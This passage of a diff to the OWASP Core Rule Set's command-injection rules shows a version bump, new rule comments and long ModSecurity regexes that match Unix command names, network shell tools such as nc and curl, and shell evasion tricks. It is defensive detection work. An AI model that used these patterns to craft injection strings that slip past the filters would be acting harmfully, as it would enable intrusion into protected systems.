(?i)\b(?:(?:7z[arx]?|(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)[\s\x0b&\),<>\|]|a(?:a-[^\s\x0b]{1,10}\b|(?:b|t(?:obm)?|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\),<>\|]|p(?:t(?:(?:itude)?[\s\x0b&\),<>\|]|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:(?:p|ch)?[\s\x0b&\),<>\|]|j(?:[\s\x0b&\),<>\|]|-register|disp)|ia2c)|s(?:h?[\s\x0b&\),<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|]))|c(?:[89]9(?:[\s\x0b&\),<>\|]|-gcc)|(?:a(?:t|ncel|psh)|c|mp)[\s\x0b&\),<>\|]|p(?:(?:an|io)?[\s\x0b&\),<>\|]|ulimit)|s(?:(?:h|cli)[\s\x0b&\),<>\|]|plit|vtool)|u(?:t[\s\x0b&\),<>\|]|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0b&\),<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)[\s\x0b&\),<>\|]|nf[\s\x0b&\),<>\|]?|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:(?:[bd]|qn|s(?:h|ac)?|cho|fax|grep|macs|val)[\s\x0b&\),<>\|]|n(?:v(?:[\s\x0b&\),<>\|]|-update)|d(?:if|sw)[\s\x0b&\),<>\|])|x(?:(?:ec|p(?:and|(?:ec|or)t|r))?[\s\x0b&\),<>\|]|iftool)|2fsck|asy_install)|f(?:(?:c|g(?:rep)?|mt|etch|lock|unction)[\s\x0b&\),<>\|]|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\),<>\|]|le(?:[\s\x0b&\),<>\|]|test))|tp(?:[\s\x0b&\),<>\|]|stats|who)|acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|o(?:ld[\s\x0b&\),<>\|]|reach)|ping[\s\x0b&\),6<>\|])|g(?:c(?:c[^\s\x0b]{1,10}\b|ore[\s\x0b&\),<>\|])|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:m[\s\x0b&\),<>\|]|ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-?[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:c(?:at)?|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:d|rb|conv|nstall)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top[\s\x0b&\),<>\|])|onice|spell)|j(?:(?:js|q|ava|exec)[\s\x0b&\),<>\|]|o(?:(?:bs|in)[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:s(?:h[\s\x0b&\),<>\|]|shell)|ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|])|l(?:d(?:d?[\s\x0b&\),<>\|]|config)|(?:[np]|ynx)[\s\x0b&\),<>\|]|s(?:(?:-F|cpu|hw|mod|of|pci|usb)?[\s\x0b&\),<>\|]|b_release)|ua(?:[\s\x0b&\),<>\|]|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|c(?:[\s\x0b&\),<>\|]|at))|(?:c(?:at|mp))?[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore))|a(?:st(?:(?:comm)?[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|ess(?:[\s\x0b&\),<>\|]|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:(?:a(?:n|il[qx]?|ke|wk)|tr|v|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:(?:re|unt)[\s\x0b&\),<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:(?:at)?[\s\x0b&\),<>\|]|\.(?:openbsd|traditional))|e(?:t(?:[\s\x0b&\),<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|m(?:ap)?|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)[\s\x0b&\),<>\|]|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:(?:d|ctave)[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:x|cman|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:[\s\x0b&\),<>\|]|2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|(?:f(?:tp)?|g(?:rep)?|(?:w|op)d|xz|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:[57]?[\s\x0b&\),<>\|]|-cgi)|i(?:(?:co?|gz|ng6?)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|[^\s\x0b]{1,10}\b)|dstat)|k(?:g(?:[\s\x0b&\),<>\|]|_?info)|exec|ill[\s\x0b&\),<>\|])|r(?:y?[\s\x0b&\),<>\|]|int(?:env|f[\s\x0b&\),<>\|]))|s(?:(?:ed|ql)?[\s\x0b&\),<>\|]|ftp)|t(?:x[\s\x0b&\),<>\|]|ar(?:[\s\x0b&\),<>\|]|diff|grep))|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|cp?|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:(?:d(?:carpet)?|v|boot|name|p(?:eat|lace))[\s\x0b&\),<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\),<>\|]|t(?:[\s\x0b&\),<>\|]|-(?:dump|tar))|user)|pm(?:(?:db)?[\s\x0b&\),<>\|]|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|ftp|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:d|ndmail|rvice)[\s\x0b&\),<>\|]|t(?:(?:facl)?[\s\x0b&\),<>\|]|arch|cap|env|sid))|h(?:(?:u(?:f|tdown))?[\s\x0b&\),<>\|]|\.distrib)|s(?:[\s\x0b&\),<>\|]|h(?:[\s\x0b&\),<>\|]|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|do(?:-rs|[\s\x0b&\),<>_\|]|edit|replay))|vn(?:[\s\x0b&\),<>\|]|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)[\s\x0b&\),<>\|]|elim)|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:(?:[cr]|ilf?)[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|(?:bl|o(?:p|uch)|ftp|mux)[\s\x0b&\),<>\|]|e(?:[ex][\s\x0b&\),<>\|]|lnet)|i(?:c[\s\x0b&\),<>\|]|me(?:(?:out)?[\s\x0b&\),<>\|]|datectl))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:l(?:imit)?[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|ma))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|p(?:2date[\s\x0b&\),<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:[ep]w|gr|rsh)?[\s\x0b&\),<>\|]|m(?:[\s\x0b&\),<>\|]|diff)|sudo(?:-rs)?)|algrind|olatility[\s\x0b&\),<>\|])|w(?:(?:c|a(?:ll|tch))?[\s\x0b&\),<>\|]|h(?:o(?:(?:is)?[\s\x0b&\),<>\|]|ami)?|iptail[\s\x0b&\),<>\|])|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:(?:x|pa)d|args|term)[\s\x0b&\),<>\|]|z(?:(?:c(?:at|mp))?[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more)|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|]))|z(?:ip(?:[\s\x0b&\),<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h[\s\x0b&\),<>\|]|oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|mo(?:dload|re[\s\x0b&\),<>\|])|ypper))(?:\b|[^0-9A-Z_a-z])" \ "id:932237,\ phase:1,\ block,\ @@ -1821,7 +1903,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1837,6 +1919,8 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\ # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -1862,7 +1946,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932238 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|(?:[\s\x0b&\),<>\|]|$).*))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0